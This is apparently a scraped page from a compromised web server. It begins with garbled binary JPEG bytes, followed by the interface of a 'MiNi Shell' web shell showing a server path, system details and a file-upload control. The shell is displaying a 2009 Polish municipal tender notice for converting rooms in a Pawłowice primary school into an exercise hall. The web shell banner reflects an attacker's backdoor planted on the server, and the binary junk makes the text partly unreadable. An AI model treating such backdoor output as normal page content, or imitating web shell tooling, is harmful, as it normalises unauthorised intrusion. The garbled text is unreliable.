JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/133294-N-2009.html

<p class="kh_header"><b>Stężyca: Adaptacja budynku szkolnego - połączenie pomieszczeń na salę ćwiczeń w budynku Szkoły Podstawowej w Pawłowicach</b><br>
<b>Numer ogłoszenia: 133294 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stężyca , pl. Senatorski 1, 08-540 Stężyca, woj. lubelskie, tel. 081 8663036.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja budynku szkolnego - połączenie pomieszczeń na salę ćwiczeń w budynku Szkoły Podstawowej w Pawłowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Adaptacja polegać będzie na:
1.Wyburzeniu dwóch ścian nośnych od strony korytarza i zastąpienie ich podciągami stalowymi ze słupami stalowymi.
2.Obniżenie poziomu podłogi o 0.82 m co zwiększy wysokość pomieszczenia z obecnej wysokości 3.40 m do wysokości 4.22 

m.
3.Wykonanie ścianki działowej od strony korytarza w lekkiej konstrukcji ALUPLAST przeszklonej w górnej części - 

dolna część do wysokości 1,00m pełna z drzwiami 120 x 210  cm.
4.Wykonanie schodów w korytarzu - zejście do sali ćwiczeń
5.Wykonanie wejścia dla osób niepełnosprawnych od zewnątrz budynku pochylnią
6.Wykonanie fundamentowania pod słupy podpierające podciągi stalowe.
7.Wykonanie tynków i izolacji przeciwwilgociowych   pionowych i poziomych sali ćwiczeń
8.Wykonanie podłóg w sali ćwiczeń
9.Wykonanie pozostałych robót wykończeniowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.20.00-1, 45.21.42.10-5, 45.26.25.22-6, 45.41.00.00-4, 45.42.11.00-5, 45.43.21.13-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE WYMAGA WADIUM<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy którzy spełniają warunki wynikające z art. 22 ust. 1 ustawy tj:

1. Posiadają uprawnienie do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek 

posiadania takich uprawnień. 
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do 

wykonywania zamówienia. 
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
        zamówienia.
4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 Prawo Zamówień Publicznych. 
5. Dotrzymają terminu realizacji zamówienia.
6. Wykażą się odpowiednim doświadczeniem tj. w ostatnich 5 latach a jeśli okres prowadzenia działalności jest 

krótszy w tym okresie zrealizowali co najmniej  3 roboty budowlane odpowiadające swoim rodzajem i wartością robotom 

budowlanym  stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania wraz z 

załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. Spełnieniem warunku będzie 

przedstawienie wykonania robót tego rodzaju o łącznej wartości nie mniejszej niż 100.000 zł. 
7. Wykażą się dysponowaniem osobami zdolnymi do wykonania zamówienia  tj. posiadających wymagane uprawnienia  wraz z 

danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia.
8. Wykażą się odpowiednim potencjałem technicznym tj. wykazem narzędzi i urządzeń jakimi dysponuje wykonawca.
9. Są ubezpieczeni od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej i przedstawia polisę 

lub inny dokument  potwierdzający ubezpieczenie.

      Sposób dokonywania oceny ww warunków będzie odbywał się według zasady spełnia-nie spełnia na podstawie 

załączonych do oferty oświadczeń i dokumentów, których wykaz został określony w punkcie VI SWIZ, składanych w celu 

potwierdzenia spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Do wypełnionego i podpisanego formularza oferty - załącznik Nr 1 do niniejszej SIWZ należy dołączyć poniższe 

oświadczenia i zaświadczenia.
2.Oświadczenie na formularzu stanowiącym załącznik Nr 2 do niniejszej SIWZ o spełnianiu wymagań z art. 22 ust. 1 

oraz że nie podlegają wykluczeniu na podstawie art. 24 ustawy.  
3. W przypadku, gdy wykonawcy wspólnie będą ubiegać się o udzielenie zamówienia pełnomocnictwo do reprezentowania 

ich w postępowaniu o udzielenia zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia 

publicznego. Upoważnienie do podpisania oferty musi być dołączone do oferty o ile nie wynika z innych dokumentów 

załączonych przez wykonawcę. 
6.4.Koncesje, zezwolenia lub licencje, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub 

licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym, zwanym dalej zamówieniem.
5.Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy 

nakładają obowiązek posiadania takich uprawnień. Wypełniony druk Informacja na temat wykazu osób nadzoru (personelu 

kierowniczego) i osób wykonujących zamówienie wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania 

zamówienia a także zakresu wykonywania przez nich czynności - załączyć uprawnienia i zaświadczenia o przynależności 

do właściwej izby samorządu zawodowego - według wzoru stanowiącego załącznik Nr 3 do niniejszej SIWZ. 
6.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, 

jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej, 

wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w 

postępowaniu o udzielenie zamówienia albo składania ofert. 
7.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń 

Społecznych potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na 

ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub 

rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji organu - wystawione nie wcześniej 

niż trzy miesiące przed terminem składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia 

albo składania ofert 
8. Aktualną informację z Krajowego Rejestru Karnego, w zakresie określonym w art. 24 ust. 1 pkt 4 -8 ustawy, 

wystawioną nie wcześniej niż 6 miesięcy przed upływem składania wniosków o dopuszczenie do udziału w postępowaniu o 

udzielenie zamówienia albo składania ofert.
9.Wypełniony Wykaz tożsamych robót budowlanych wykonanych w okresie ostatnich pięciu lat stanowiący załącznik Nr 4 

do niniejszej SIWZ a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającym swoim 

rodzajem i wartością robotom budowlanym, stanowiącym przedmiot zamówienia, w podaniem ich wartości oraz daty i 

miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. 

Spełnieniem warunku będzie przedstawienie wykonania robót tego rodzaju o łącznej wartości nie mniejszej niż 100.000 

zł. 
10.Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje wykonawca - według wzoru 

stanowiącego załącznik Nr 5 do niniejszej SIWZ..  
11.Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, 

potwierdzająca wysokości posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej 

niż trzy miesiące przed upływem terminu składania ofert. Minimalna kwota  jaka powinna znajdować się na rachunku 

bankowym wykonawcy winna wynosić 200.000 zł.
12.Polisę a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od 

odpowiedzialności cywilnej w zakresie prowadzonej działalności. 
13. Kosztorys ofertowy sporządzony metodą kalkulacji uproszczonej wraz z zestawieniem materiałów i sprzętu w oparciu 

o załączony do niniejszej SIWZ przedmiar robót.
14.W trakcie realizacji przedmiotu umowy zamawiający nie dopuszcza do zmian cen jednostkowych oferty.
15.Akceptowany wzór umowy - załącznik Nr 6 do niniejszej SIWZ.

 Dokumenty można złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez jedną z osób 

uprawnionych do reprezentacji wykonawcy z dopiskiem za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.stezyca.netbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminy Stężyca, ul. Plac Senatorski 1, 08-540 Stężyca, pok nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2009 godzina 12:00, miejsce: Gminy Stężyca, ul. Plac Senatorski 1, 08-540 Stężyca, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com